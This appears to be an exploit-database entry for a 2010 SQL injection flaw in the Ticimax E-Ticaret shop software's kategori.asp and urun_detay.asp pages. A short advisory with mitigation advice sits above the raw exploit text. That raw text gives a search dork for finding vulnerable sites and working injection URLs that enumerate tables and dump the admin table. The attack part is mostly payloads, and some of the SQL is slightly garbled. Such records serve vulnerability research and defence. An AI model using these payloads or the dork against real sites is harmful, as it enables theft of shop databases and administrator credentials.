Ticimax E-Ticaret (SQL Injection)

vendor:

Ticimax E-Ticaret

by:

Neuromancer

5.5

CVSS

MEDIUM

SQL Injection

CWE

Product Name: Ticimax E-Ticaret

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2010

Ticimax E-Ticaret (SQL Injection)

The Ticimax E-Ticaret application is vulnerable to SQL Injection in the Kategori.asp and urun_detay.asp pages. An attacker can exploit this vulnerability by injecting malicious SQL queries in the 'id' parameter of the URLs.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize user inputs and use prepared statements or parameterized queries to prevent SQL Injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: [Ticimax E-Ticaret ( SQL Injection ) ]
# Date: [01.06.2010]
# Author: [Neuromancer]
# Version: [app version]
# CVE : [if exists]
# Code : [exploit code] 


#####################
# Author: [Neuromancer]
# contact : msn[at]neurom4ncer[dot]com
# From : TURKEY
#####################


Ticimax e-ticaret ( Kategori.asp, urun_detay.aspLocal SQL Injection Vulnerability

Dork : "Bu Site Ticimax E-Ticaret yaz&#305;l&#305;m&#305; ile haz&#305;rlanm&#305;&#351;t&#305;r"


======================================================================

                       --=[ Vuln C0de ]=-
 
                               [-] localhost/kategori.asp?id='
                               [-] localhost/urun_detay.asp?id='

http://[Site].com/kategori.asp?id=1 order by 1
http://[Site].com/kategori.asp?id=1 union select x,x,group_concat(table_name)+from+information.schema.tables

or

http://[Site].com/kategori.asp?id=1 union select * from admin

=========================| -=[ Attackerz Crew co. ]=- |=========================

Gr33t'z; h4cker.tr, by_fatih, by.kiki, TheNesa, RedMasTeR